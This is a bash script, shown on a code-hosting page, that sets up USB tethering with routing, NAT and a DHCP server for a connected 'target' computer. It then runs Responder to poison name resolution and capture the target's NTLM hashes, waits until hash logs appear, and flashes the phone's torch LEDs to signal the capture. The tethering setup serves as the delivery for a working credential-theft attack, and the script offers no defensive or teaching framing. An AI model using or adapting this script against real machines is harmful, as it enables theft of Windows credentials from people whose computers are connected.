-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathusbtethering_linux
315 lines (276 loc) · 10.9 KB
/
usbtethering_linux
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
#!/bin/bash
#########################################
#### Define default global variables ####
#########################################
DEPS=(isc-dhcp-server isc-dhcp-common)
################################
#### Define shell functions ####
################################
function print_usage() {
echo "[!] Usage: usbtethering [OPTIONS]"
echo " -o(required) upstream interface"
echo " -i(required) usb network interface"
echo " -A(required) The BEGIN of DHCP IP address"
echo " -B(required) The END of DCHP IP address"
echo " -C(required) The Gateway IP of usb network interface"
echo " -D(required) The IP subnet mask address in octet format"
echo " -k Perform clean up process. Used with -o and -i option only."
echo ""
echo " e.g. usbtethering -o wlan0 -i rndis0 -A 192.168.100.10 -B 192.168.100.15 -C 192.168.100.1 -D 255.255.255.0"
echo " e.g. usbtethering -o wlan0 -i rndis0 -k"
}
function kill_proc() {
echo "[!] Bringing down $USB_IFACE and reverting the iptables-legacy."
## Kill the dhcpd process ##
pkill dhcpd
pkill python2
## Remove dhcpd stuff. ##
rm -f /var/lib/dhcp/dhcpd.leases
rm /tmp/auto_share_network.conf
rm /run/dhcpd.pid
## Disable ip forward ##
echo 0 > /proc/sys/net/ipv4/ip_forward
## Revert iptables-legacy setting dumped from kernel log. ##
if [ ! "$UPSTREAM_IFACE" = "$USB_IFACE" ]; then
iptables-legacy -t filter -D FORWARD -i $USB_IFACE -o $UPSTREAM_IFACE -j ACCEPT
iptables-legacy -t filter -D FORWARD -i $UPSTREAM_IFACE -o $USB_IFACE -j ACCEPT
iptables-legacy -t nat -D POSTROUTING -o $UPSTREAM_IFACE -j MASQUERADE
ip rule del from all iif $USB_IFACE lookup local
else
iptables-legacy -t filter -D FORWARD -i $USB_IFACE -o $USB_IFACE -j ACCEPT
iptables-legacy -t nat -D POSTROUTING -o $UPSTREAM_IFACE -j MASQUERADE
fi
## Bringing down the usb interface ##
ip link set $USB_IFACE down
ip addr flush dev $USB_IFACE
ifconfig $USB_IFACE down
echo "[+] Done."
exit 0
}
function dep_check() {
for i in "${DEPS[@]}"
do
PKG_OK=$(/usr/bin/dpkg-query -W --showformat='${Status}\n' ${i}|grep "install ok installed")
echo "[+] Checking for installed dependency: ${i}"
if [ "$PKG_OK" = "" ]; then
echo "[-] Missing dependency: ${i}"
echo "[+] Attempting to install...."
/usr/bin/sudo apt-get -y install ${i}
fi
## Let's check if it really has $i installed ##
PKG_OK=$(/usr/bin/dpkg-query -W --showformat='${Status}\n' ${i}|grep "install ok installed")
[ "$PKG_OK" = "" ] && echo "[-] $i not installed." && exit 1 || echo "[+] $i is installed."
done
}
function config_ip() {
## Setup the usb interface first. The ip, gateway, subnet mask.. ##
ip link set $USB_IFACE down
ip addr flush dev $USB_IFACE
ip addr add $IP_GW/$IP_SUB_CDIR dev $USB_IFACE
ip link set $USB_IFACE up
## Config ip route, ip rule & ip tables ##
if [ ! "$UPSTREAM_IFACE" = "$USB_IFACE" ]; then
ip route append $IP_NET_ADDR/$IP_SUB_CDIR dev $USB_IFACE src $IP_GW proto kernel scope link table $(ip rule list | head -n1 | sed -n -e 's/^.*lookup \(.*$\)/\1/p')
# ip rule add from all iif $USB_IFACE lookup $UPSTREAM_IFACE
ip rule add from all iif $USB_IFACE lookup 255
iptables-legacy -t filter -I FORWARD 1 -i $USB_IFACE -o $UPSTREAM_IFACE -j ACCEPT
iptables-legacy -t filter -I FORWARD 2 -i $UPSTREAM_IFACE -o $USB_IFACE -j ACCEPT
iptables-legacy -t nat -I POSTROUTING 1 -o $UPSTREAM_IFACE -j MASQUERADE
else
ip route append $IP_NET_ADDR/$IP_SUB_CDIR dev $USB_IFACE src $IP_GW proto kernel scope link table $(ip rule list | head -n1 | sed -n -e 's/^.*lookup \(.*$\)/\1/p')
iptables-legacy -t filter -I FORWARD 1 -i $USB_IFACE -o $USB_IFACE -j ACCEPT
iptables-legacy -t nat -I POSTROUTING 1 -o $UPSTREAM_IFACE -j MASQUERADE
fi
## Enable ip forwording ##
echo 1 > /proc/sys/net/ipv4/ip_forward
}
function start_dhcpd() {
## Remove all previous leases, pid and conf files ##
[ -s /var/lib/dhcp/dhcpd.leases ] && rm -f /var/lib/dhcp/dhcpd.leases
[ -s /tmp/auto_share_network.conf ] && rm /tmp/auto_share_network.conf
[ -s /run/dhcpd.pid ] && rm /run/dhcpd.pid
## Recreate leases file ##
touch /var/lib/dhcp/dhcpd.leases
## Create custom dhcpd.conf ##
cat << EOF > /tmp/auto_share_network.conf
ddns-update-style none;
default-lease-time 6000;
max-lease-time 7200;
authoritative;
log-facility local7;
subnet $IP_NET_ADDR netmask $IP_SUB_OCTET {
interface $USB_IFACE;
range $IP_BEGIN $IP_END;
option routers $IP_GW;
option domain-name "local";
option domain-name-servers $IP_GW;
}
EOF
## Start dhcpd ##
/usr/sbin/dhcpd -cf /tmp/auto_share_network.conf -q
}
function calc_net_addr() {
local IP_BEGIN_OCTET_ARRAY
local IP_END_OCTET_ARRAY
local IP_GW_OCTET_ARRAY
local IP_SUB_OCTET_ARRAY
IFS='.'; IP_BEGIN_OCTET_ARRAY=(${IP_BEGIN[@]}); unset IFS
IFS='.'; IP_END_OCTET_ARRAY=(${IP_END[@]}); unset IFS
IFS='.'; IP_GW_OCTET_ARRAY=(${IP_GW[@]}); unset IFS
IFS='.'; IP_SUB_OCTET_ARRAY=(${IP_SUB_OCTET[@]}); unset IFS
for i in $(seq 0 3); do
IP_BEGIN_OCTET_ARRAY[$i]=$((${IP_BEGIN_OCTET_ARRAY[$i]} & ${IP_SUB_OCTET_ARRAY[$i]}))
IP_END_OCTET_ARRAY[$i]=$((${IP_END_OCTET_ARRAY[$i]} & ${IP_SUB_OCTET_ARRAY[$i]}))
IP_GW_OCTET_ARRAY[$i]=$((${IP_GW_OCTET_ARRAY[$i]} & ${IP_SUB_OCTET_ARRAY[$i]}))
if [ ${IP_BEGIN_OCTET_ARRAY[$i]} -ne ${IP_END_OCTET_ARRAY[$i]} -o ${IP_BEGIN_OCTET_ARRAY[$i]} -ne ${IP_GW_OCTET_ARRAY[$i]} ]; then
echo "[-] Subnet mask not matching with the Gateway of Target IP address."
exit 1
fi
done
IP_NET_ADDR="${IP_GW_OCTET_ARRAY[0]}.${IP_GW_OCTET_ARRAY[1]}.${IP_GW_OCTET_ARRAY[2]}.${IP_GW_OCTET_ARRAY[3]}"
}
function octet_to_cdir(){
local INPUT=$1
local BITSET
local OUTPUT
local _TEMP_INPUT
BITSET=(128 64 32 16 8 4 2 1)
if ! echo "$INPUT" | grep -E -q "^[0-9]+$"; then echo "[-] $INPUT is not an integer."; exit 1; fi
[ $INPUT -gt 255 ] && echo "[-] $INPUT is not a valid octet as it is larger than 255" && exit 1
for i in $(seq 0 $((${#BITSET[@]} -1))); do
_TEMP_INPUT=$INPUT
INPUT=$(($INPUT % ${BITSET[$i]}))
[ $_TEMP_INPUT -eq $INPUT ] && OUTPUT[$i]=0 || OUTPUT[$i]=1
done
echo "${OUTPUT[@]}" | $BUSYBOX tr -d ' '
}
function is_valid_subnetmask() {
local SUBNET_MASK_OCTET_ARRAY
local SUBNET_MASK_OCTET_BINARY
IFS='.'; SUBNET_MASK_OCTET_ARRAY=($1); unset IFS
for i in $(seq 0 3); do
SUBNET_MASK_OCTET_ARRAY[$i]=$(octet_to_cdir ${SUBNET_MASK_OCTET_ARRAY[$i]})
done
SUBNET_MASK_OCTET_BINARY=${SUBNET_MASK_OCTET_ARRAY[0]}${SUBNET_MASK_OCTET_ARRAY[1]}${SUBNET_MASK_OCTET_ARRAY[2]}${SUBNET_MASK_OCTET_ARRAY[3]}
if [ ${#SUBNET_MASK_OCTET_BINARY} -ne 32 ] || ! echo "$SUBNET_MASK_OCTET_BINARY" | grep -E -q "^[1]*[0]*$"; then
echo "[-] Invalid subnet mask address."
exit 1
fi
IP_SUB_CDIR=`echo $SUBNET_MASK_OCTET_BINARY | grep -E -o "^[1]*"`
IP_SUB_CDIR=${#IP_SUB_CDIR}
#echo "IP_SUB_CDIR: $IP_SUB_CDIR"
}
function is_valid_ip_format() {
for tmp_ip in "$@"; do
if ! echo $tmp_ip | grep -q -E '^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$'; then
echo "[-] $tmp_ip is not a valid IP address format."
print_usage; exit 1
fi
done
}
function args_check() {
for args in "$@"; do
if [ "$(eval echo \$$args)" = "" ]; then
echo "[-] $args is not specified."
print_usage; exit 1
fi
done
}
###################
#### Main Part ####
###################
## Print help if args = --help ##
if [ "$1" = "--help" ]; then
print_usage; exit 1
fi
## Parse the args first. ##
while getopts "o:i:c:A:B:C:D:k" OPTS; do
case $OPTS in
o) UPSTREAM_IFACE=$OPTARG;;
i) USB_IFACE=$OPTARG;;
#c) TIMEOUT=$OPTARG;;
A) IP_BEGIN=$OPTARG;;
B) IP_END=$OPTARG;;
C) IP_GW=$OPTARG;;
D) IP_SUB_OCTET=$OPTARG;;
k) WANT_TO_KILL=1;;
*) print_usage; exit 1;;
esac
done
## Check if user wants to kill process ##
if [ ! -z $WANT_TO_KILL ]; then
if [ ! -z $UPSTREAM_IFACE ] && [ ! -z $USB_IFACE ]; then
kill_proc
else
print_usage; exit 1
fi
fi
## Check if specific args is empty or not, if it is empty then print the usage. ##
args_check UPSTREAM_IFACE USB_IFACE IP_BEGIN IP_END IP_GW IP_SUB_OCTET
## Check if the upstream interface and usb network interface really exist. ##
if ! ip addr show $UPSTREAM_IFACE > /dev/null 2>&1; then
echo "[-] $UPSTREAM_IFACE interface not found."
exit 1
fi
if ! ip addr show $USB_IFACE > /dev/null 2>&1; then
echo "[-] $USB_IFACE interface not found."
exit 1
fi
## Check if all the specified ip variables are valid ip address format. ##
is_valid_ip_format $IP_BEGIN $IP_END $IP_GW $IP_SUB_OCTET
is_valid_subnetmask $IP_SUB_OCTET
## Calculate the IP net address ##
calc_net_addr
## Echo the input ##
echo "[!] UPSTREAM_IFACE: $UPSTREAM_IFACE"
echo "[!] USB_IFACE: $USB_IFACE"
echo "[!] IP_BEGIN: $IP_BEGIN"
echo "[!] IP_END: $IP_END"
echo "[!] IP_GW: $IP_GW"
echo "[!] IP_SUB_OCTET: $IP_SUB_OCTET"
echo "[!] IP_NET_ADDR: $IP_NET_ADDR"
# echo "IP_SUB_CDIR: $IP_SUB_CDIR"
## Let's get party! ##
dep_check
config_ip
trap kill_proc INT
start_dhcpd
#Responder Part
echo "[!] Clearing Responder Logs and DB"
rm /tools/responder/logs/*
rm /tools/responder/*.db
echo "[!] Running Responder to capture ntlm"
python2 /tools/responder/Responder.py -I $USB_IFACE -e $IP_GW -w -d -r -P 1>/dev/null &
## Get target's IP and PC name ##
## loop over the lease file to see if target has been given the ip address and internet access. ##
echo "[!] Assigning address to target" #"timeout: $TIMEOUT"
while true; do
# echo "[!] Assigning address to target, timeout: $TIMEOUT"
TARGET_ADDR=$(cat /var/lib/dhcp/dhcpd.leases | grep "^lease" | awk 'NR==1{print $2}');
if [ -z "$TARGET_ADDR" ]; then
sleep 1
else
echo "[+] Target ip address: $TARGET_ADDR"
TARGET_PC_NAME=$(cat /var/lib/dhcp/dhcpd.leases | grep "client-hostname" | awk 'NR==1{print $2}' | tr -d "\"\;")
echo "[+] Target PC name: $TARGET_PC_NAME"
break
fi
done
## Enter to kill program ##
echo "[+] BRING IT ON !! LETS ROCK & ROLL !!"
#echo "[!] And DONT Forget to Hit 'ENTER' button to Kill Me"
#read
#check until ntlm logs are found
cd /tools/responder
echo "[+] Checking NTLM has been captured"
until [ -f logs/*NTLM* ]
do
sleep 1
done
#NTLM has been captured. turn on flash light (AOSP) A10-13 Only
echo "[!] NTLM has beem captured, shutting down."
echo 50 > /sys/class/leds/led\:torch_0/brightness
echo 50 > /sys/class/leds/led\:torch_1/brightness
echo 1 > /sys/class/leds/led\:switch_0/brightness
## Shutdown and Job Done! ##
kill_proc